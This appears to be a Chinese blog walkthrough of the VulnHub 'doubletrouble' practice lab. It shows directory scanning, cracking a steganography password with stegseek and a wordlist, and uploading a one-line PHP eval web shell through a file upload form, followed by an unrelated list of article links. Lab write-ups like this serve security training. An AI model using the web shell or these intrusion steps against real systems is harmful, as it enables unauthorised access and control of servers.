当前位置: 首页 > news >正文

vulnhub-doubletrouble靶场攻略

1.打开靶场,需要改一下网卡配置,然后重启,找到网段后使用nmap扫描一下网段

2.我们来看一下80端口网页

3.接下来我们来扫一下目录

dirsearch -u http://192.168.149.159/

4.我们在secret目录里面发现了一张照片,我们使用工具扫一下这个图片看看能不能发现什么,发现图片需要密码才可以

5.我们来下载一下这个工具,网址如下

https://github.com/RickdeJager/stegseek/releases

6.下载好后输入以下内容

dpkg -i stegseek_0.6-1.deb    #安装

7.将kali的字典解压到一个目录里面

gunzip /usr/share/wordlists/rockyou.txt.gz /dict

8.然后开始爆破,输入以下内容,得到了一个邮箱和密码

stegseek --crack doubletrouble.jpg /dict/rockyou.txt -xf output.txt

9.我们来登录一下

10.我们在这个地方找见了上传文件的地方

11.我们来写一个木马文件上传一下

<?php @eval($_POST['cmd']);?>

12.然后来到upload/users目录就可以看到我们上传的木马了

13.然后我们使用shell连接工具连一下

http://www.dtcms.com/a/325000.html

相关文章:

  • Linux C文件操作函数
  • 谷歌DeepMind发布Genie 3:通用型世界模型,可生成前所未有多样化的交互式虚拟环境
  • C++移动语义、完美转发及编译器优化零拷贝
  • PostgreSQL 批量COPY导入优化参数配置
  • 近红外与可见光图像融合的多种方法实现
  • OpenAI正式发布GPT-5:迈向AGI的关键一步
  • Java基础-多线程
  • lesson34:深入理解Python线程:从基础到实战优化
  • hysAnalyser --- 支持文件转播UDP/RTP实时流功能
  • CompletableFuture实现Excel 多个sheet页批量导出
  • 【数据分析】循环移位岭回归分析:光遗传学冻结行为模式研究
  • 【PyTorch】单目标检测项目部署
  • MPLS的基本工作原理
  • AI玩具新浪潮:百亿资本涌入,情感计算重塑陪伴经济
  • WAIC2025逛展分享·AI鉴伪技术洞察“看不见”的伪造痕迹
  • JAVA中关于Stream流的使用
  • 虚拟主机示例
  • vuhub drippingblues靶场攻略
  • Windows环境下私有化部署Dify,并接入通义千问模型
  • UNet改进(31):基于Adaptive Attention的UNet设计与实践
  • 基于Spring SSE构建实时监控系统
  • Python 的列表 list 和元组 tuple 有啥本质区别?啥时候用谁更合适?
  • TC39x STM(System Timer)学习记录
  • 压力测试等工具源码包编译及使用方法
  • Vulnhub doubletrouble 靶场复现 详细攻略
  • Knuth‘s TwoSum Algorithm 原理详解
  • MyBatis 核心入门:从概念到实战,一篇掌握简单增删改查
  • 【东枫科技】FR3 可扩展测试平台,适用于 6G 研究与卫星通信,高达 1.6 GHz 的带宽
  • 【自动化运维神器Ansible】playbook案例解析:Tags组件实现任务选择性执行
  • 【01】华勤技术股份有限公司——华勤C++笔试,题目记录及解析